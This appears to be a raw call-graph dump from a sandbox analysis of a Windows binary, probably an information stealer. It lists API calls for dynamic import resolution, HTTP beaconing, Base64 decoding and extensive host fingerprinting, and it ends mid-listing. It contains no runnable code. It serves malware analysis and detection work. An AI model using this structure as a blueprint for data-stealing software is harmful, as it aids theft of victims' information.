40433b 81716->81717 81718 4043b0 2 API calls 81717->81718 81719 404354 81718->81719 81720 4043b0 2 API calls 81719->81720 81721 40436d 81720->81721 81722 4043b0 2 API calls 81721->81722 81723 404386 81722->81723 81724 4043b0 2 API calls 81723->81724 81725 40439f 81724->81725 81726 416240 81725->81726 81727 416250 43 API calls 81726->81727 81728 416666 8 API calls 81726->81728 81727->81728 81729 416776 81728->81729 81730 4166fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81728->81730 81731 416783 8 API calls 81729->81731 81732 416846 81729->81732 81730->81729 81731->81732 81733 4168c8 81732->81733 81734 41684f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81732->81734 81735 4168d5 6 API calls 81733->81735 81736 416967 81733->81736 81734->81733 81735->81736 81737 416974 9 API calls 81736->81737 81738 416a4f 81736->81738 81737->81738 81739 416ad2 81738->81739 81740 416a58 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81738->81740 81741 416adb GetProcAddress GetProcAddress 81739->81741 81742 416b0c 81739->81742 81740->81739 81741->81742 81743 416b45 81742->81743 81744 416b15 GetProcAddress GetProcAddress 81742->81744 81745 416b52 8 API calls 81743->81745 81746 416c15 81743->81746 81744->81743 81745->81746 81747 416c7f 81746->81747 81748 416c1e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81746->81748 81749 416ca1 81747->81749 81750 416c88 GetProcAddress 81747->81750 81748->81747 81751 412cc6 81749->81751 81752 416caa GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81749->81752 81750->81749 81751->80937 81752->81751 81754 4141f0 GetVolumeInformationA 81753->81754 81755 4141e9 81753->81755 81759 41422e 81754->81759 81755->81754 81756 414299 GetProcessHeap HeapAlloc 81757 4142c5 wsprintfA 81756->81757 81758 4142b6 81756->81758 81761 416d40 lstrcpy 81757->81761 81760 416d40 lstrcpy 81758->81760 81759->81756 81762 412d94 81760->81762 81761->81762 81762->80957 81764 416da0 lstrcpy 81763->81764 81765 404559 81764->81765 82783 404470 81765->82783 81767 404565 81768 416d40 lstrcpy 81767->81768 81769 404597 81768->81769 81770 416d40 lstrcpy 81769->81770 81771 4045a4 81770->81771 81772 416d40 lstrcpy 81771->81772 81773 4045b1 81772->81773 81774 416d40 lstrcpy 81773->81774 81775 4045be 81774->81775 81776 416d40 lstrcpy 81775->81776 81777 4045cb InternetOpenA StrCmpCA 81776->81777 81778 404604 81777->81778 81779 404b8b InternetCloseHandle 81778->81779 82795 415260 81778->82795 81781 404ba8 81779->81781 82810 4094a0 CryptStringToBinaryA 81781->82810 81782 404623 82803 416f20 81782->82803 81786 404636 81787 416ea0 lstrcpy 81786->81787 81792 40463f 81787->81792 81788 416e20 2 API calls 81789 404bc5 81788->81789 81790 416fb0 4 API calls 81789->81790 81793 404bdb 81790->81793 81791 404be7 ctype 81795 416da0 lstrcpy 81791->81795 81796 416fb0 4 API calls 81792->81796 81794 416ea0 lstrcpy 81793->81794 81794->81791 81808 404c17 81795->81808 81797 404669 81796->81797 81798 416ea0 lstrcpy 81797->81798 81799 404672 81798->81799 81800 416fb0 4 API calls 81799->81800 81801 404691 81800->81801 81802 416ea0 lstrcpy 81801->81802 81803 40469a 81802->81803 81804 416f20 3 API calls 81803->81804 81805 4046b8 81804->81805 81806 416ea0 lstrcpy 81805->81806 81807 4046c1 81806->81807 81809 416fb0 4 API calls 81807->81809 81808->80960 81810 4046e0 81809->81810 81811 416ea0 lstrcpy 81810->81811 81812 4046e9 81811->81812 81813 416fb0 4 API calls 81812->81813 81814 404708 81813->81814 81815 416ea0 lstrcpy 81814->81815 81816 404711 81815->81816 81817 416fb0 4 API calls 81816->81817 81818 40473d 81817->81818 81819 416f20 3 API calls 81818->81819 81820 404744 81819->81820 81821 416ea0 lstrcpy 81820->81821 81822 40474d 81821->81822 81823 404763 InternetConnectA 81822->81823 81823->81779 81824 404793 HttpOpenRequestA 81823->81824 81826 4047e8 81824->81826 81827 404b7e InternetCloseHandle 81824->81827 81828 416fb0 4 API calls 81826->81828 81827->81779 81829 4047fc 81828->81829 81830 416ea0 lstrcpy 81829->81830 81831 404805 81830->81831 81832 416f20 3 API calls 81831->81832 81833 404823 81832->81833 81834 416ea0 lstrcpy 81833->81834 81835 40482c 81834->81835 81836 416fb0 4 API calls 81835->81836 81837 40484b 81836->81837 81838 416ea0 lstrcpy 81837->81838 81839 404854 81838->81839 81840 416fb0 4 API calls 81839->81840 81841 404875 81840->81841 81842 416ea0 lstrcpy 81841->81842 81843 40487e 81842->81843 81844 416fb0 4 API calls 81843->81844 81845 40489e 81844->81845 81846 416ea0 lstrcpy 81845->81846 81847 4048a7 81846->81847 81848 416fb0 4 API calls 81847->81848 81849 4048c6 81848->81849 81850 416ea0 lstrcpy 81849->81850 81851 4048cf 81850->81851 81852 416f20 3 API calls 81851->81852 81853 4048ed 81852->81853 81854 416ea0 lstrcpy 81853->81854 81855 4048f6 81854->81855 81856 416fb0 4 API calls 81855->81856 81857 404915 81856->81857 81858 416ea0 lstrcpy 81857->81858 81859 40491e 81858->81859 81860 416fb0 4 API calls 81859->81860 81861 40493d 81860->81861 81862 416ea0 lstrcpy 81861->81862 81863 404946 81862->81863 81864 416f20 3 API calls 81863->81864 81865 404964 81864->81865 81866 416ea0 lstrcpy 81865->81866 81867 40496d 81866->81867 81868 416fb0 4 API calls 81867->81868 81869 40498c 81868->81869 81870 416ea0 lstrcpy 81869->81870 81871 404995 81870->81871 81872 416fb0 4 API calls 81871->81872 81873 4049b6 81872->81873 81874 416ea0 lstrcpy 81873->81874 81875 4049bf 81874->81875 81876 416fb0 4 API calls 81875->81876 81877 4049df 81876->81877 81878 416ea0 lstrcpy 81877->81878 81879 4049e8 81878->81879 81880 416fb0 4 API calls 81879->81880 81881 404a07 81880->81881 81882 416ea0 lstrcpy 81881->81882 81883 404a10 81882->81883 81884 416f20 3 API calls 81883->81884 81885 404a2e 81884->81885 81886 416ea0 lstrcpy 81885->81886 81887 404a37 81886->81887 81888 416d40 lstrcpy 81887->81888 81889 404a52 81888->81889 81890 416f20 3 API calls 81889->81890 81891 404a73 81890->81891 81892 416f20 3 API calls 81891->81892 81893 404a7a 81892->81893 81894 416ea0 lstrcpy 81893->81894 81895 404a86 81894->81895 81896 404aa7 lstrlen 81895->81896 81897 404aba 81896->81897 81898 404ac3 lstrlen 81897->81898 82809 4170d0 81898->82809 81900 404ad3 HttpSendRequestA 81901 404af2 InternetReadFile 81900->81901 81902 404b27 InternetCloseHandle 81901->81902 81907 404b1e 81901->81907 81905 416e00 81902->81905 81904 416fb0 4 API calls 81904->81907 81905->81827 81906 416ea0 lstrcpy 81906->81907 81907->81901 81907->81902 81907->81904 81907->81906 82819 4170d0 81908->82819 81910 40fb04 StrCmpCA 81911 40fb17 81910->81911 81912 40fb0f ExitProcess 81910->81912 81913 40fb27 strtok_s 81911->81913 81916 40fb34 81913->81916 81914 40fccc 81914->80962 81915 40fca8 strtok_s 81915->81916 81916->81914 81916->81915 81917 40fc8b StrCmpCA 81916->81917 81918 40fc6c StrCmpCA 81916->81918 81919 40fb9d StrCmpCA 81916->81919 81920 40fbed StrCmpCA 81916->81920 81921 40fc4d StrCmpCA 81916->81921 81922 40fc2e StrCmpCA 81916->81922 81923 40fbbf StrCmpCA 81916->81923 81924 40fc0f StrCmpCA 81916->81924 81925 416e20 lstrlen lstrcpy 81916->81925 81917->81915 81917->81916 81918->81916 81919->81916 81920->81916 81921->81916 81922->81916 81923->81916 81924->81916 81925->81916 81927 416da0 lstrcpy 81926->81927 81928 401513 81927->81928 81929 416da0 lstrcpy 81928->81929 81930 401525 81929->81930 81931 416da0 lstrcpy 81930->81931 81932 401537 81931->81932 81933 416da0 lstrcpy 81932->81933 81934 401549 81933->81934 81935 405610 81934->81935 81936 416da0 lstrcpy 81935->81936 81937 405629 81936->81937 81938 404470 3 API calls 81937->81938 81939 405635 81938->81939 81940 416d40 lstrcpy 81939->81940 81941 40566a 81940->81941 81942 416d40 lstrcpy 81941->81942 81943 405677 81942->81943 81944 416d40 lstrcpy 81943->81944 81945 405684 81944->81945 81946 416d40 lstrcpy 81945->81946 81947 405691 81946->81947 81948 416d40 lstrcpy 81947->81948 81949 40569e InternetOpenA StrCmpCA 81948->81949 81950 4056cd 81949->81950 81951 405c70 InternetCloseHandle 81950->81951 81953 415260 3 API calls 81950->81953 81952 405c8d 81951->81952 81955 4094a0 4 API calls 81952->81955 81954 4056ec 81953->81954 81956 416f20 3 API calls 81954->81956 81957 405c93 81955->81957 81958 4056ff 81956->81958 81960 416e20 2 API calls 81957->81960 81963 405ccc ctype 81957->81963 81959 416ea0 lstrcpy 81958->81959 81965 405708 81959->81965 81961 405caa 81960->81961 81962 416fb0 4 API calls 81961->81962 81964 405cc0 81962->81964 81967 416da0 lstrcpy 81963->81967 81966 416ea0 lstrcpy 81964->81966 81968 416fb0 4 API calls 81965->81968 81966->81963 81977 405cfc 81967->81977 81969 405732 81968->81969 81970 416ea0 lstrcpy 81969->81970 81971 40573b 81970->81971 81972 416fb0 4 API calls 81971->81972 81973 40575a 81972->81973 81974 416ea0 lstrcpy 81973->81974 81975 405763 81974->81975 81976 416f20 3 API calls 81975->81976 81978 405781 81976->81978 81977->80968 81979 416ea0 lstrcpy 81978->81979 81980 40578a 81979->81980 81981 416fb0 4 API calls 81980->81981 81982 4057a9 81981->81982 81983 416ea0 lstrcpy 81982->81983 81984 4057b2 81983->81984 81985 416fb0 4 API calls 81984->81985 81986 4057d1 81985->81986 81987 416ea0 lstrcpy 81986->81987 81988 4057da 81987->81988 81989 416fb0 4 API calls 81988->81989 81990 405806 81989->81990 81991 416f20 3 API calls 81990->81991 81992 40580d 81991->81992 81993 416ea0 lstrcpy 81992->81993 81994 405816 81993->81994 81995 40582c InternetConnectA 81994->81995 81995->81951 81996 40585c HttpOpenRequestA 81995->81996 81998 405c63 InternetCloseHandle 81996->81998 81999 4058bb 81996->81999 81998->81951 82000 416fb0 4 API calls 81999->82000 82001 4058cf 82000->82001 82002 416ea0 lstrcpy 82001->82002 82003 4058d8 82002->82003 82004 416f20 3 API calls 82003->82004 82005 4058f6 82004->82005 82006 416ea0 lstrcpy 82005->82006 82007 4058ff 82006->82007 82008 416fb0 4 API calls 82007->82008 82009 40591e 82008->82009 82010 416ea0 lstrcpy 82009->82010 82011 405927 82010->82011 82012 416fb0 4 API calls 82011->82012 82013 405948 82012->82013 82014 416ea0 lstrcpy 82013->82014 82015 405951 82014->82015 82016 416fb0 4 API calls 82015->82016 82017 405971 82016->82017 82018 416ea0 lstrcpy 82017->82018 82019 40597a 82018->82019 82020 416fb0 4 API calls 82019->82020 82021 405999 82020->82021 82022 416ea0 lstrcpy 82021->82022 82023 4059a2 82022->82023 82024 416f20 3 API calls 82023->82024 82025 4059c0 82024->82025 82026 416ea0 lstrcpy 82025->82026 82027 4059c9 82026->82027 82028 416fb0 4 API calls 82027->82028 82029 4059e8 82028->82029 82030 416ea0 lstrcpy 82029->82030 82031 4059f1 82030->82031 82032 416fb0 4 API calls 82031->82032 82033 405a10 82032->82033 82034 416ea0 lstrcpy 82033->82034 82035 405a19 82034->82035 82036 416f20 3 API calls 82035->82036 82037 405a37 82036->82037 82038 416ea0 lstrcpy 82037->82038 82039 405a40 82038->82039 82040 416fb0 4 API calls 82039->82040 82041 405a5f 82040->82041 82042 416ea0 lstrcpy 82041->82042 82043 405a68 82042->82043 82044 416fb0 4 API calls 82043->82044 82045 405a89 82044->82045 82046 416ea0 lstrcpy 82045->82046 82047 405a92 82046->82047 82048 416fb0 4 API calls 82047->82048 82049 405ab2 82048->82049 82050 416ea0 lstrcpy 82049->82050 82051 405abb 82050->82051 82052 416fb0 4 API calls 82051->82052 82053 405ada 82052->82053 82054 416ea0 lstrcpy 82053->82054 82055 405ae3 82054->82055 82056 416f20 3 API calls 82055->82056 82057 405b01 82056->82057 82058 416ea0 lstrcpy 82057->82058 82059 405b0a 82058->82059 82060 405b1d lstrlen 82059->82060 82820 4170d0 82060->82820 82062 405b2e lstrlen GetProcessHeap HeapAlloc 82821 4170d0 82062->82821 82064 405b5b lstrlen 82822 4170d0 82064->82822 82066 405b6b memcpy 82823 4170d0 82066->82823 82068 405b84 lstrlen 82069 405b94 82068->82069 82070 405b9d lstrlen memcpy 82069->82070 82824 4170d0 82070->82824 82072 405bc7 lstrlen 82825 4170d0 82072->82825 82074 405bd7 HttpSendRequestA 82075 405be2 InternetReadFile 82074->82075 82076 405c17 InternetCloseHandle 82075->82076 82080 405c0e 82075->82080 82076->81998 82078 416fb0 4 API calls 82078->82080 82079 416ea0 lstrcpy 82079->82080 82080->82075 82080->82076 82080->82078 82080->82079 82826 4170d0 82081->82826 82083 40f3d7 strtok_s 82087 40f3e4 82083->82087 82084 40f48d strtok_s 82084->82087 82085 40f4b1 82085->80970 82086 416e20 lstrlen lstrcpy 82086->82087 82087->82084 82087->82085 82087->82086 82827 4170d0 82088->82827 82090 40f227 strtok_s 82093 40f234 82090->82093 82091 40f387 82091->80978 82092 40f363 strtok_s 82092->82093 82093->82091 82093->82092 82094 40f314 StrCmpCA 82093->82094 82095 40f297 StrCmpCA 82093->82095 82096 40f2d7 StrCmpCA 82093->82096 82097 416e20 lstrlen lstrcpy 82093->82097 82094->82093 82095->82093 82096->82093 82097->82093 82099 416d40 lstrcpy 82098->82099 82100 40fd26 82099->82100 82101 416fb0 4 API calls 82100->82101 82102 40fd37 82101->82102 82103 416ea0 lstrcpy 82102->82103 82104 40fd40 82103->82104 82105 416fb0 4 API calls 82104->82105 82106 40fd5b 82105->82106 82107 416ea0 lstrcpy 82106->82107 82108 40fd64 82107->82108 82109 416fb0 4 API calls 82108->82109 82110 40fd7d 82109->82110 82111 416ea0 lstrcpy 82110->82111 82112 40fd86 82111->82112 82113 416fb0 4 API calls 82112->82113 82114 40fda1 82113->82114 82115 416ea0 lstrcpy 82114->82115 82116 40fdaa 82115->82116 82117 416fb0 4 API calls 82116->82117 82118 40fdc3 82117->82118 82119 416ea0 lstrcpy 82118->82119 82120 40fdcc 82119->82120 82121 416fb0 4 API calls 82120->82121 82122 40fde7 82121->82122 82123 416ea0 lstrcpy 82122->82123 82124 40fdf0 82123->82124 82125 416fb0 4 API calls 82124->82125 82126 40fe09 82125->82126 82127 416ea0 lstrcpy 82126->82127 82128 40fe12 82127->82128 82129 416fb0 4 API calls 82128->82129 82130 40fe2d 82129->82130 82131 416ea0 lstrcpy 82130->82131 82132 40fe36 82131->82132 82133 416fb0 4 API calls 82132->82133 82134 40fe4f 82133->82134 82135 416ea0 lstrcpy 82134->82135 82136 40fe58 82135->82136 82137 416fb0 4 API calls 82136->82137 82138 40fe76 82137->82138 82139 416ea0 lstrcpy 82138->82139 82140 40fe7f 82139->82140 82141 4141c0 6 API calls 82140->82141 82142 40fe96 82141->82142 82143 416f20 3 API calls 82142->82143 82144 40fea9 82143->82144 82145 416ea0 lstrcpy 82144->82145 82146 40feb2 82145->82146 82147 416fb0 4 API calls 82146->82147 82148 40fedc 82147->82148 82149 416ea0 lstrcpy 82148->82149 82150 40fee5 82149->82150 82151 416fb0 4 API calls 82150->82151 82152 40ff05 82151->82152 82153 416ea0 lstrcpy 82152->82153 82154 40ff0e 82153->82154 82828 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 82154->82828 82156 40ff1e 82157 416fb0 4 API calls 82156->82157 82158 40ff2e 82157->82158 82159 416ea0 lstrcpy 82158->82159 82160 40ff37 82159->82160 82161 416fb0 4 API calls 82160->82161 82162 40ff56 82161->82162 82163 416ea0 lstrcpy 82162->82163 82164 40ff5f 82163->82164 82165 416fb0 4 API calls 82164->82165 82166 40ff80 82165->82166 82167 416ea0 lstrcpy 82166->82167 82168 40ff89 82167->82168 82831 414380 GetCurrentProcess IsWow64Process 82168->82831 82171 416fb0 4 API calls 82172 40ffa9 82171->82172 82173 416ea0 lstrcpy 82172->82173 82174 40ffb2 82173->82174 82175 416fb0 4 API calls 82174->82175 82176 40ffd1 82175->82176 82177 416ea0 lstrcpy 82176->82177 82178 40ffda 82177->82178 82179 416fb0 4 API calls 82178->82179 82180 40fffb 82179->82180 82181 416ea0 lstrcpy 82180->82181 82182 410004 82181->82182 82833 4143c0 GetProcessHeap HeapAlloc GetUserNameA 82182->82833 82184 410014 82185 416fb0 4 API calls 82184->82185 82186 410024 82185->82186 82187 416ea0 lstrcpy 82186->82187 82188 41002d 82187->82188 82189 416fb0 4 API calls 82188->82189 82190 41004c 82189->82190 82191 416ea0 lstrcpy 82190->82191 82192 410055 82191->82192 82193 416fb0 4 API calls 82192->82193 82194 410075 82193->82194 82195 416ea0 lstrcpy 82194->82195 82196 41007e 82195->82196 82197 414400 3 API calls 82196->82197 82198 41008e 82197->82198 82199 416fb0 4 API calls 82198->82199 82200 41009e 82199->82200 82201 416ea0 lstrcpy 82200->82201 82202 4100a7 82201->82202 82203 416fb0 4 API calls 82202->82203 82204 4100c6 82203->82204 82205 416ea0 lstrcpy 82204->82205 82206 4100cf 82205->82206 82207 416fb0 4 API calls 82206->82207 82208 4100f0 82207->82208 82209 416ea0 lstrcpy 82208->82209 82210 4100f9 82209->82210 82834 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 82210->82834 82212 410109 82213 416fb0 4 API calls 82212->82213 82214 410119 82213->82214 82215 416ea0 lstrcpy 82214->82215 82216 410122 82215->82216 82217 416fb0 4 API calls 82216->82217 82218 410141 82217->82218 82219 416ea0 lstrcpy 82218->82219 82220 41014a 82219->82220 82221 416fb0 4 API calls 82220->82221 82222 41016b 82221->82222 82223 416ea0 lstrcpy 82222->82223 82224 410174 82223->82224 82835 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 82224->82835 82227 416fb0 4 API calls 82228 410194 82227->82228 82229 416ea0 lstrcpy 82228->82229 82230 41019d 82229->82230 82231 416fb0 4 API calls 82230->82231 82232 4101bc 82231->82232 82233 416ea0 lstrcpy 82232->82233 82234 4101c5 82233->82234 82235 416fb0 4 API calls 82234->82235 82236 4101e5 82235->82236 82237 416ea0 lstrcpy 82236->82237 82238 4101ee 82237->82238 82838 414530 GetUserDefaultLocaleName 82238->82838 82241 416fb0 4 API calls 82242 41020e 82241->82242 82243 416ea0 lstrcpy 82242->82243 82244 410217 82243->82244 82245 416fb0 4 API calls 82244->82245 82246 410236 82245->82246 82247 416ea0 lstrcpy 82246->82247 82248 41023f 82247->82248 82249 416fb0 4 API calls 82248->82249 82250 410260 82249->82250 82251 416ea0 lstrcpy 82250->82251 82252 410269 82251->82252 82843 414570 82252->82843 82254 410280 82255 416f20 3 API calls 82254->82255 82256 410293 82255->82256 82257 416ea0 lstrcpy 82256->82257 82258 41029c 82257->82258 82259 416fb0 4 API calls 82258->82259 82260 4102c6 82259->82260 82261 416ea0 lstrcpy 82260->82261 82262 4102cf 82261->82262 82263 416fb0 4 API calls 82262->82263 82264 4102ef 82263->82264 82265 416ea0 lstrcpy 82264->82265 82266 4102f8 82265->82266 82855 414710 GetSystemPowerStatus 82266->82855 82269 416fb0 4 API calls 82270 410318 82269->82270 82271 416ea0 lstrcpy 82270->82271 82272 410321 82271->82272 82273 416fb0 4 API calls 82272->82273 82274 410340 82273->82274 82275 416ea0 lstrcpy 82274->82275 82276 410349 82275->82276 82277 416fb0 4 API calls 82276->82277 82278 41036a 82277->82278 82279 416ea0 lstrcpy 82278->82279 82280 410373 82279->82280 82281 41037e GetCurrentProcessId 82280->82281 82857 415b70 OpenProcess 82281->82857 82284 416f20 3 API calls 82285 4103a4 82284->82285 82286 416ea0 lstrcpy 82285->82286 82287 4103ad 82286->82287 82288 416fb0 4 API calls 82287->82288 82289 4103d7 82288->82289 82290 416ea0 lstrcpy 82289->82290 82291 4103e0 82290->82291 82292 416fb0 4 API calls 82291->82292 82293 410400 82292->82293 82294 416ea0 lstrcpy 82293->82294 82295 410409 82294->82295 82862 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 82295->82862 82297 410419 82298 416fb0 4 API calls 82297->82298 82299 410429 82298->82299 82300 416ea0 lstrcpy 82299->82300 82301 410432 82300->82301 82302 416fb0 4 API calls 82301->82302 82303 410451 82302->82303 82304 416ea0 lstrcpy 82303->82304 82305 41045a 82304->82305 82306 416fb0 4 API calls 82305->82306 82307 41047b 82306->82307 82308 416ea0 lstrcpy 82307->82308 82309 410484 82308->82309 82865 414800 82309->82865 82312 416fb0 4 API calls 82313 4104a4 82312->82313 82314 416ea0 lstrcpy 82313->82314 82315 4104ad 82314->82315 82316 416fb0 4 API calls 82315->82316 82317 4104cc 82316->82317 82318 416ea0 lstrcpy 82317->82318 82319 4104d5 82318->82319 82320 416fb0 4 API calls 82319->82320 82321 4104f6 82320->82321 82322 416ea0 lstrcpy 82321->82322 82323 4104ff 82322->82323 82880 4147c0 GetSystemInfo wsprintfA 82323->82880 82325 41050f 82326 416fb0 4 API calls 82325->82326 82327 41051f 82326->82327 82328 416ea0 lstrcpy 82327->82328 82329 410528 82328->82329 82330 416fb0 4 API calls 82329->82330 82331 410547 82330->82331 82332 416ea0 lstrcpy 82331->82332 82333 410550 82332->82333 82334 416fb0 4 API calls 82333->82334 82335 410570 82334->82335 82336 416ea0 lstrcpy 82335->82336 82337 410579 82336->82337 82881 414960 GetProcessHeap HeapAlloc 82337->82881 82339 410589 82340 416fb0 4 API calls 82339->82340 82341 410599 82340->82341 82342 416ea0 lstrcpy 82341->82342 82343 4105a2 82342->82343 82344 416fb0 4 API calls 82343->82344 82345 4105c1 82344->82345 82346 416ea0 lstrcpy 82345->82346 82347 4105ca 82346->82347 82348 416fb0 4 API calls 82347->82348 82349 4105eb 82348->82349 82350 416ea0 lstrcpy 82349->82350 82351 4105f4 82350->82351 82886 414ed0 82351->82886 82354 416f20 3 API calls 82355 41061e 82354->82355 82356 416ea0 lstrcpy 82355->82356 82357 410627 82356->82357 82358 416fb0 4 API calls 82357->82358 82359 410651 82358->82359 82360 416ea0 lstrcpy 82359->82360 82361 41065a 82360->82361 82362 416fb0 4 API calls 82361->82362 82363 41067a 82362->82363 82364 416ea0 lstrcpy 82363->82364 82365 410683 82364->82365 82366 416fb0 4 API calls 82365->82366 82367 4106a2 82366->82367 82368 416ea0 lstrcpy 82367->82368 82369 4106ab 82368->82369 82891 414a00 82369->82891 82371 4106c2 82372 416f20 3 API calls 82371->82372 82373 4106d5 82372->82373 82374 416ea0 lstrcpy 82373->82374 82375 4106de 82374->82375 82376 416fb0 4 API calls 82375->82376 82377 41070a 82376->82377 82378 416ea0 lstrcpy 82377->82378 82379 410713 82378->82379 82380 416fb0 4 API calls 82379->82380 82381 410732 82380->82381 82382 416ea0 lstrcpy 82381->82382 82383 41073b 82382->82383 82384 416fb0 4 API calls 82383->82384 82385 41075c 82384->82385 82386 416ea0 lstrcpy 82385->82386 82387 410765 82386->82387 82388 416fb0 4 API calls 82387->82388 82389 410784 82388->82389 82390 416ea0 lstrcpy 82389->82390 82391 41078d 82390->82391 82392 416fb0 4 API calls 82391->82392 82393 4107ae 82392->82393 82394 416ea0 lstrcpy 82393->82394 82395 4107b7 82394->82395 82899 414ae0 82395->82899 82397 4107d3 82398 416f20 3 API calls 82397->82398 82399 4107e6 82398->82399 82400 416ea0 lstrcpy 82399->82400 82401 4107ef 82400->82401 82402 416fb0 4 API calls 82401->82402 82403 410819 82402->82403 82404 416ea0 lstrcpy 82403->82404 82405 410822 82404->82405 82406 416fb0 4 API calls 82405->82406 82407 410843 82406->82407 82408 416ea0 lstrcpy 82407->82408 82409 41084c 82408->82409 82410 414ae0 17 API calls 82409->82410 82411 410868 82410->82411 82412 416f20 3 API calls 82411->82412 82413 41087b 82412->82413 82414 416ea0 lstrcpy 82413->82414 82415 410884 82414->82415 82416 416fb0 4 API calls 82415->82416 82417 4108ae 82416->82417 82418 416ea0 lstrcpy 82417->82418 82419 4108b7 82418->82419 82420 416fb0 4 API calls 82419->82420 82421 4108d6 82420->82421 82422 416ea0 lstrcpy 82421->82422 82423 4108df 82422->82423 82424 416fb0 4 API calls 82423->82424 82425 410900 82424->82425 82426 416ea0 lstrcpy 82425->82426 82427 410909 82426->82427 82935 414de0 82427->82935 82429 410920 82430 416f20 3 API calls 82429->82430 82431 410933 82430->82431 82432 416ea0 lstrcpy 82431->82432 82433 41093c 82432->82433 82434 41095a lstrlen 82433->82434 82435 41096a 82434->82435 82436 416d40 lstrcpy 82435->82436 82437 41097c 82436->82437 82438 401500 lstrcpy 82437->82438 82439 41098a 82438->82439 82945 404dc0 82439->82945 82441 410996 82441->80982 83125 4170d0 82442->83125 82444 404cc9 InternetOpenUrlA 82448 404ce1 82444->82448 82445 404cea InternetReadFile 82445->82448 82446 404d5c InternetCloseHandle InternetCloseHandle 82447 404da8 82446->82447 82447->80986 82448->82445 82448->82446 83126 4092b0 82449->83126 82451 40ef93 82452 40efb4 82451->82452 82453 40f1cf 82451->82453 82455 40efcd StrCmpCA 82452->82455 82454 401500 lstrcpy 82453->82454 82456 40f1dd 82454->82456 82457 40efd8 82455->82457 82485 40f04f 82455->82485 83290 40ea90 82456->83290 82459 416da0 lstrcpy 82457->82459 82461 40eff0 82459->82461 82463 401500 lstrcpy 82461->82463 82462 40f06e StrCmpCA 82464 40f07d 82462->82464 82501 40f14e 82462->82501 82466 40f01e 82463->82466 82465 416d40 lstrcpy 82464->82465 82467 40f08a 82465->82467 82468 416da0 lstrcpy 82466->82468 82472 416fb0 4 API calls 82467->82472 82473 40f032 82468->82473 82469 40f17d StrCmpCA 82470 40f188 82469->82470 82471 40f1c7 82469->82471 82474 401500 lstrcpy 82470->82474 82471->80990 82475 40f0b2 82472->82475 82476 416da0 lstrcpy 82473->82476 82477 40f196 82474->82477 82478 416f20 3 API calls 82475->82478 82479 40f04a 82476->82479 82480 416da0 lstrcpy 82477->82480 82481 40f0b9 82478->82481 83129 40e420 82479->83129 82483 40f1aa 82480->82483 82484 416fb0 4 API calls 82481->82484 82486 416da0 lstrcpy 82483->82486 82485->82462 82501->82469 82784 404486 82783->82784 82815 414ff0 malloc 82784->82815 82786 4044af 82816 414ff0 malloc 82786->82816 82788 4044c5 82817 414ff0 malloc 82788->82817 82790 4044db 82791 4044f5 lstrlen 82790->82791 82818 4170d0 82791->82818 82793 404505 InternetCrackUrlA 82794 404524 82793->82794 82794->81767 82796 416d40 lstrcpy 82795->82796 82797 415274 82796->82797 82798 416d40 lstrcpy 82797->82798 82799 415282 GetSystemTime 82798->82799 82801 415299 82799->82801 82800 416da0 lstrcpy 82802 4152fc 82800->82802 82801->82800 82802->81782 82804 416f31 82803->82804 82805 416f88 82804->82805 82808 416f68 lstrcpy lstrcat 82804->82808 82806 416da0 lstrcpy 82805->82806 82807 416f94 82806->82807 82807->81786 82808->82805 82809->81900 82811 4094d9 LocalAlloc 82810->82811 82812 404bae 82810->82812 82811->82812 82813 4094f4 CryptStringToBinaryA 82811->82813 82812->81788 82812->81791 82813->82812 82814 409519 LocalFree 82813->82814 82814->82812 82815->82786 82816->82788 82817->82790 82818->82793 82819->81910 82820->82062 82821->82064 82822->82066 82823->82068 82824->82072 82825->82074 82826->82083 82827->82090 82829 414362 RegCloseKey 82828->82829 82830 414345 RegQueryValueExA 82828->82830 82829->82156 82830->82829 82832 40ff99 82831->82832 82832->82171 82833->82184 82834->82212 82836 4144f7 wsprintfA 82835->82836 82837 410184 82835->82837 82836->82837 82837->82227 82839 4101fe 82838->82839 82840 41455a 82838->82840 82839->82241 83107 415420 LocalAlloc CharToOemW 82840->83107 82842 414566 82842->82839 82844 416d40 lstrcpy 82843->82844 82845 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 82844->82845 82854 4145e2 82845->82854 82846 414603 GetLocaleInfoA 82846->82854 82847 4146d5 82848 4146e5 82847->82848 82849 4146db LocalFree 82847->82849 82851 416da0 lstrcpy 82848->82851 82849->82848 82850 416fb0 lstrcpy lstrlen lstrcpy lstrcat 82850->82854 82852 4146f4 82851->82852 82852->82254 82853 416ea0 lstrcpy 82853->82854 82854->82846 82854->82847 82854->82850 82854->82853 82856 410308 82855->82856 82856->82269 82858 415b93 K32GetModuleFileNameExA CloseHandle 82857->82858 82859 415bb5 82857->82859 82858->82859 82860 416d40 lstrcpy 82859->82860 82861 410391 82860->82861 82861->82284 82863 4147a2 RegCloseKey 82862->82863 82864 414785 RegQueryValueExA 82862->82864 82863->82297 82864->82863 82866 414836 GetLogicalProcessorInformationEx 82865->82866 82867 414855 GetLastError 82866->82867 82874 4148ab 82866->82874 82868 414860 82867->82868 82869 41489f 82867->82869 82879 414869 82868->82879 82870 410494 82869->82870 83111 4150f0 GetProcessHeap HeapFree 82869->83111 82870->82312 83110 4150f0 GetProcessHeap HeapFree 82874->83110 82876 414893 82876->82870 82877 4148fd 82877->82870 82878 414906 wsprintfA 82877->82878 82878->82870 82879->82866 82879->82876 83108 4150f0 GetProcessHeap HeapFree 82879->83108 83109 415110 GetProcessHeap HeapAlloc 82879->83109 82880->82325 82882 415090 82881->82882 82883 41498a GlobalMemoryStatusEx 82882->82883 82884 4149a0 __aulldiv 82883->82884 82885 4149d8 wsprintfA 82884->82885 82885->82339 82887 414ee8 GetProcessHeap HeapAlloc wsprintfA 82886->82887 82889 416d40 lstrcpy 82887->82889 82890 41060b 82889->82890 82890->82354 82892 416d40 lstrcpy 82891->82892 82898 414a16 82892->82898 82893 414a50 82894 416da0 lstrcpy 82893->82894 82896 414ac9 82894->82896 82895 416fb0 lstrcpy lstrlen lstrcpy lstrcat 82895->82898 82896->82371 82897 416ea0 lstrcpy 82897->82898 82898->82893 82898->82895 82898->82897 82900 416d40 lstrcpy 82899->82900 82901 414af9 RegOpenKeyExA 82900->82901 82902 414b4b 82901->82902 